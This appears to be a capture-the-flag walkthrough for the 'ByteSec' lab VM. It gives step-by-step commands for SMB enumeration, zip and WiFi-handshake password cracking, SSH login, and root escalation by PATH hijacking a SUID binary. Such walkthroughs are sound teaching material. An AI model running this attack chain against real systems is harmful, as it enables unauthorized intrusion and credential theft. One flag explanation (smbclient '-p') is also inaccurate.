Byte Sec

Flag : 2 Flag first user And second root. Learning : exploit, SMB, Enumration, Stenography, Privilege Escalation. We recommend that you use VirtualBox and not VMware for this VM

URL: OS ByteSec

Difficulty: Intermediate

Author: Rahul Gehlaut

Enumeration

Set up the Machine with a host-only adapter and run a net discover command to find the associated IP. My interface eth1 is Host-Only on my main OS (Kali Linux).

netdiscover -i eth1

net

We can identify the machine with the IP 192.168.56.116, so we will scan it for open ports with nmap to a file named “nmap” with the following command:

nmap -sS -p- -A -o "nmap" 192.168.56.116

nmap

We have identified ports 80 139 445 2525 are open. Ports 138 and 2525 are worth noting as they could be smb. Read more about Samba shares here

To start, port 80 is open so we will investigate this port with a browser.

web page

At first glance, the bottom of the web page has the following text:

####################GET#####smb##############free 

This is also seen in the page source:

source

This gives us a pretty obvious hint that there is probably samba running. Let’s perform some enumeration based on this information with the tool enum4linux. This tool is for enumerating information from Windows and Samba systems.

enum4linux 192.168.56.116 

enum4linux

Known Usernames = administrator, guest, krbtgt, domain admins, root, bin, none.

Let’s try and log into SMB with smbclient. This tool launches an ftp-like client to access SMB/CIFS resources on servers - computerhope.

Execute the following command:

smbclient //192.168.56.116/smb -U smb -p

To break this command down, we are specifying the //host/smb with user -U smb and -p enables a printer service rather than as a normal filespace service.

smb

We are logged in. There is a file named safe.zip and main.txt which we will transfer to our local system with “get”.

ls
get safe.zip
get main.txt

There doesn’t seem to be anything on main.txt, let’s have a look at the archive:

unzip safe.zip

zip

The .zip file seems to be password protected. There is a tool we can use to try and crack the password by brute forcing.

fcrackzip is a zip file password cracker.

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u safe.zip

To break down this command, -D specifies a dictionary attack, -p specifies the rockyou.txt dictionary and -u specifies the file we want to crack. The command will essentially try to decompress the zip archive using the passwords in the wordlist and return the password when successful.

cracked

A password has been found:

PASSWORD FOUND!!!!: pw == hacker1

Unzipping the file using the password gives us a .cap file. A .cap file is a packet capture file which can be analysed with traffic capture software such as Wireshark. To read more about this, Life Wire have a pretty good article on this. Let’s open up the file with Wireshark.

Looking at the .cap file, we see the protocol 802.11 being used. This Wireshark website explains the protocol that is seen on this traffic capture: Wireshark

After some research, we can identify WLAN as IEEE 802.11. These could be packets captured via WiFi. When analysing Wifi traffic, can often find a 3-way handshake whenever someone joins the network. We can try and crack this .cap file for any passwords.

Let’s use aircrack-ng, a tool which accesses WiFi network security. Run the following command:

aircrack-ng user.cap -w /usr/share/wordlists/rockyou.txt

aircrack

Aircrack has found a password:

KEY FOUND! [ snowflake ]

There is a username that can easily be seen in the packet capture:

blackjax

user

Now that we have a username and password, let’s try logging in with SSH. If you remember, a different port was open for ssh.

cat nmap | grep ssh

SSH on port 2525.

ssh [email protected] -p 2525

ssh login

Privilege Escalation

Let’s upgrade our shell with the following command:

python -c 'import pty;pty.spawn("/bin/bash")'

python

There are a few different home directories for users sagar, smb and blackjax:

home

This next section will be focusing on exploiting Set User ID (SUID). This is a good article about this if you want to read more:

Recipe for Root

And another website for some priv esc with a section on SUID:

Github

The following command will identify any SUID enabled executables on the unix machine:

find / -user root -perm -4000 -print 2>/dev/null

find

For reference, these are a list of binaries native to Linux, meaning we should not investigate any of these:

ping
ping6
passwd
sudo
chfn
apring
gpasswd
chsh
chfn
mount
sudo
su
umount
mount
newgrp
pppd

One of the binaries identified from the command:

/usr/bin/netscan

This is evidently not native so let’s have a closer look. Run the binary with the following command:

/usr/bin/netscan

netscan

Let’s exploit this with the following commands:

cd /tmp
echo "/bin/bash" > netstat
chmod 777 netstat
export PATH=/tmp:$PATH
/usr/bin/netscan

These commands essentially create a file called netstat in /tmp with correct permissions. The export command marks an environment variable to be exported to child-processes. Then the netscan binary is run again.

exploit

And we are root, with root flag:

root

Written on May 21, 2020